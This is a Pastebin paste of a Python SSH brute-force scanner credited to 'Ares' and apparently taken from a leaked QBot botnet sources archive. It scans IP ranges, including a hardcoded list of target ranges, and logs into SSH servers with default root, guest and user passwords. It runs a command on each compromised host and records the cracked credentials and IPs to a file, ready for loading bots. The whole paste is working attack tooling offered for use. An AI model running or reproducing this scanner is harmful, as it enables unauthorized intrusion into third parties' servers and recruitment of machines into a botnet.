Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # http://leakedfiles.org/Archive/Malware/Botnet%20Files/QboT%20Sources/%5b%252A%20Scanners%20%252A%5d/Python/Love
- # %20ares%20bot%20scanners/ ( JIAHDI RELEASED THIS ON HIS SITE LOL FULL MEMES THANKS FOR THE SUPPORT BIG HACKA <3 )
- # MADE WITH LOVE BY ARES
- # IG:Love.Ares IG:Love.Hecate
- # HIT ME UP FOR PRIVATE RANGES
- import threading, paramiko, random, socket, time, sys
- paramiko.util.log_to_file("/dev/null")
- server_ip = "173.0.51.121"
- blacklisted = ["127.0","10.0","192.168"]
- passwords = ["root:root"]
- if sys.argv[4] == "1":
- passwords = ["root:root"]
- if sys.argv[4] == "guest":
- passwords = ["guest:guest"]
- if sys.argv[4] == "user":
- passwords = ["user:1111"]
- if len(sys.argv) < 4:
- sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
- print """\n\x1b[0;37m*******************************************************************************
- * \x1b[1;31mLOVE \x1b[1;35mSCANNER \x1b[1;31mPROCESS\x1b[0;37m *
- *******************************************************************************\x1b[0m"""
- # Note : ( Stopped and took a dab at 2:15pm )
- def sshscanner(ip):
- global passwords
- try:
- thisipisbad='no'
- for badip in blacklisted:
- if badip in ip:
- thisipisbad='yes'
- if thisipisbad=='yes':
- sys.exit()
- username='root'
- password="0"
- port = 22
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3)
- s.connect((ip, port))
- data = str(s.recv(1024))
- if "SSH" in data:
- print("\x1b[1;35m| <3 | \x1b[1;31mScanning \x1b[1;35m| SSH | \x1b[1;31mWith \x1b[1;35m| Love | \x1b[1;31m<3 \x1b[1;35m | " + ip + "\x1b[37m")
- elif "ssh" in data:
- print("\x1b[1;31m<3 Scanning \x1b[1;35mSSH \x1b[1;31mWith Love <3 \x1b[1;35m " + ip + "\x1b[37m")
- else:
- sys.exit()
- s.close()
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- dobreak=False
- for passwd in passwords:
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- ssh.connect(ip, port = port, username=username, password=password, timeout=3)
- break
- except:
- pass
- badserver=True
- stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
- output = stdout.read()
- if "inet addr" in output:
- badserver=False
- websites = [ ]
- if badserver == False:
- print("\x1b[1;37mLoading [\x1b[1;34mLOVE\x1b[1;37m] Bot <3 " + ip + ": \x1b[1;34m[" + username + "] : [" + password + "]\x1b[37m")
- ssh.exec_command('')
- vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
- time.sleep(12)
- ssh.close()
- except Exception as e:
- pass
- if sys.argv[2] == "LUCKY":
- ranges = ["190.232.0.0/190.236.255.255", "212.194.0.0/212.195.255.255", "190.13.0.0/190.13.255.255", "190.40.0.0/190.42.255.255", "190.48.0.0/190.49.255.255", "190.96.0.0/190.97.255.255", "190.232.0.0/190.239.255.255", "190.184.0.0/190.184.255.255", "181.174.0.0/181.174.255.255", "186.183.0.0/186.183.255.255", "122.170.0.0/122.173.255.255", "122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "59.177.0.0/59.178.255.255", "59.180.0.0/59.180.255.255", "59.182.0.0/59.184.255.255", "181.64.0.0/181.67.255.255", "200.106.0.0/200.106.255.255", "200.121.0.0/200.121.255.255", "201.230.0.0/201.230.255.255", "201.240.0.0/201.240.255.255","101.108.0.0/101.109.255.255""192.0.0/192.168.255.255.255"]
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- if sys.argv[2] != "LUCKY":
- a = int(sys.argv[2].split(".")[0])
- b = int(sys.argv[2].split(".")[1])
- c = int(sys.argv[2].split(".")[2])
- d = int(sys.argv[2].split(".")[3])
- else:
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- x = 0
- while(True):
- try:
- if sys.argv[2] != "LUCKY":
- endaddr = sys.argv[3]
- else:
- endaddr = endrng
- d += 1
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if d > 255:
- c += 1
- d = 0
- if c > 255:
- b += 1
- c = 0
- if b > 255:
- a += 1
- b = 0
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if ipaddr == endaddr:
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if x > 500:
- time.sleep(1)
- x = 0
- t = threading.Thread(target=sshscanner, args=(ipaddr,))
- t.start()
- except Exception as e:
- pass
- print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement